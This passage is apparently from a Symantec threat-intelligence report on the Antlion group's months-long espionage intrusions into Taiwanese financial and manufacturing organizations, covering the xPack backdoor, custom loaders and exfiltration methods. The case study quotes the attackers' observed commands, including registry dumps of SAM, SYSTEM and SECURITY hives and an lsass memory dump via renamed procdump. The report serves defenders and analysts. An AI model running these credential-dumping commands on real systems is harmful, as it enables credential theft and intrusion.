case study below, Antlion compromised the networks of at least two other organizations in Taiwan, including another financial organization and a manufacturing company. The activity the group carried out on those networks was largely similar to the activity that is detailed in the case study, with the xPack backdoor frequently deployed and a lot of evidence of credential dumping. In the manufacturing target, also, we see the attackers attempting to download malicious files via SMB shares.
The attackers also spent a significant amount of time on both these targeted networks, spending close to 250 days on the financial organization and around 175 days on the manufacturing organization.
Symantec, a division of Broadcom, cannot state with certainty what the initial infection vector used by the attackers in this campaign was, though in one instance they were seen utilizing the MSSQL service to execute system commands, which indicates that the most likely infection vector was exploitation of a web application or service. However, Antlion are also known to have previously used malicious emails to gain initial access to victim networks.
The main custom backdoor used by Antlion in this campaign was the xPack backdoor, which is a custom .NET loader that decrypts (AES), loads, and executes accompanying .bin files. Its decryption password is provided as a command-line argument (Base64 encoded string), and xPack is intended to be run as a standalone application or as a service (xPackSvc variant). The xPack malware and its associated payload seems to be used for initial access; it appears that xPack was predominantly used to execute system commands, drop subsequent malware and tools, and stage data for exfiltration. The attackers also used a custom keylogger and three custom loaders.
- EHAGBPSL loader – custom loader written in C++ – loaded by JpgRun loader
- JpgRun loader – customer loader written in C++ – similar to xPack, reads the decryption key and filename from the command line – decodes the file and executes it
- CheckID – custom loader written in C++ – based on loader used by BlackHole RAT
The attackers also used a custom SMB session enumeration tool (NetSessionEnum), a custom bind/reverse file transfer tool named ENCODE MMC, and a Kerberos golden ticket tool based on Mimikatz.
The attackers also used a variety of off-the-shelf tools, as well as leveraging living-off-the-land tools such as PowerShell, WMIC, ProcDump, LSASS, and PsExec. The legitimate AnyDesk tool was also abused by the attackers for remote access in one of the victim organizations. The attackers were also observed leveraging exploits such as CVE-2019-1458 for privilege escalation and remote scheduled tasks to execute their backdoor. CVE-2019-1458 is an elevation-of-privilege vulnerability that occurs in Windows when the Win32k component fails to properly handle objects in memory.
Legitimate versions of WinRAR appear to have been exploited by the attackers for data exfiltration, while there is also evidence of data exfiltration via PowerShell, specifically using the BitsTransfer module to initiate an upload to attacker-controlled infrastructure. There is also evidence that the attackers likely automated the data collection process via batch scripts, while there is also evidence of instances where data was likely staged for further exfiltration, though it was not actually observed being exfiltrated from the network. In these instances, it appears the attackers were interested in collecting information from software pertaining to business contacts, investments, and smart card readers.
Case study: Attack on a financial organization
The attackers spent a significant amount of time on victims’ networks, and deployed both custom and off-the-shelf malware. In one financial sector victim in Taiwan the attackers spent almost nine months on the victim network.
The first suspicious activity on this victim network occurred in December 2020 when WMIC was used to execute two commands:
- wmic process get CSName,Description,ExecutablePath,ProcessId /format:”;CSIDL_SYSTEMwbemzh-twhtable.xsl”;
- wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:”;CSIDL_SYSTEMwbemzh-twhtable.xsl”;
The first command was used to list the computer name, description of processes, executable path, and process ID. The output was written to a suspicious file named htable.xsl under the wbem directory. The second command was used to collect information about the system, which was written out to the same file (htable.xsl). Information collected included:
- Version of the operating system (OS)
- The installation date
- The last time the system was booted
- The local date and time of the system
- The manufacturer
- The registered user
- Service pack information – this can be used to determine what patches are installed
- System directory path
Five minutes after those commands were issued, WMIC was used to dump credentials:
- reg save HKLMSAM CSIDL_COMMON_DOCUMENTSsam.hiv
- reg save HKLMSYSTEM CSIDL_COMMON_DOCUMENTSsys.hiv
- reg save hklmsecurity CSIDL_COMMON_DOCUMENTSsecurity.hiv
The commands listed above were all executed via Antlion’s custom xPack backdoor.
Several days later, during the Christmas holiday period, the attackers returned over a period of a few days and executed the xPack backdoor again. They also executed an unknown VBS script via PsExec multiple times:
- “;cscript.exe”; CSIDL_SYSTEM_DRIVEupdate.vbs
On December 28, the attackers used xPack to launch a command prompt to dump credentials from several machines within the compromised organization with the following commands:
- upload.exe -accepteula -ma lsass.exe 16.dmp (a renamed version of Sysinternals procdump64.exe)
- reg save hklmsam CSIDL_PROFILEpublicsam.hive
- reg save hklmsystem CSIDL_PROFILEpublicsystem.hive
- reg save hklmsecurity CSIDL_PROFILEpublicsecurity.hive
Over the following couple of weeks, the attackers continued to return intermittently to launch the xPack backdoor or to dump credentials via the registry. Then, following a few weeks of inactivity, they become active on the infected network once again.
The attackers used the xPack backdoor to launch a command prompt to execute the following commands:
- “;cmd”; /K CHCP 950
- CHCP 950
- query user
- “;CSIDL_SYSTEMquser.exe”;
- tasklist /v
- findstr explorer
- cmd /c dir “;CSIDL_PROFILEdesktop”;
- CSIDL_SYSTEMcmd.exe /c cmd /c dir users /b
- cmd /c dir “;CSIDL_PROFILEdesktop”;
- cmd /c dir users /b
- reg save hklmsecurity CSIDL_COMMON_DOCUMENTSsecurity.hiv
- rar a -r -hp1qaz@WSX3edc!@# W22-009-099.tmp “;CSIDL_COMMON_DOCUMENTSw22-009-099_file”;
- reg save hklmsystem CSIDL_COMMON_DOCUMENTSsystem.hiv
- reg save hklmsam CSIDL_COMMON_DOCUMENTSsam.hiv
The above commands were used to firstly change the code page to 950, which is the Windows code page for Traditional Chinese. The attackers then executed ‘query user’ to list any logged-in users on the system, as well as running ‘tasklist’ to get a list of all the running processes on the system. They also tried to discover what processes were running, before listing all contents of the Desktop directory and the Users directory. After this, the attackers dumped credentials again via the registry.
The attackers returned to the network a couple of weeks later and carried out largely the same activity. The attackers remained active on the network for March, April, and May 2021, intermittently returning to launch their xPack backdoor or dump credentials from the registry. Dumping credentials appears to be a main focus of the attackers, with them likely using these credentials to move laterally across the network to identify machines of interest from which they can exfiltrate data.
The last activity on this network, after a gap of three months, occurred in August 2021, when the attackers returned and listed all available shares. They then dumped credentials from the registry and proceeded to collect account, group, and workstation configuration information.
They then dumped credentials from the registry once again. This was the last activity seen on this network.
Experienced actor stays active
Antlion is believed to have been involved in espionage activities since at least 2011, and this recent activity shows that it is still an actor to be aware of more than 10 years after it first appeared.
The length of time that Antlion was able to spend on victim networks is notable, with the group able to spend several months on victim networks, affording plenty of time to seek out and exfiltrate potentially sensitive information from infected organizations. The targeting of Taiwan is perhaps unsurprising given we know Chinese state-backed groups tend to be interested in organizations in that region.
Protection
For the latest protection updates, please visit the Symantec Protection Bulletin.
Indicators of Compromise (IOCs)
If an IOC is malicious and the file is available to us, Symantec Endpoint products will detect and block that file.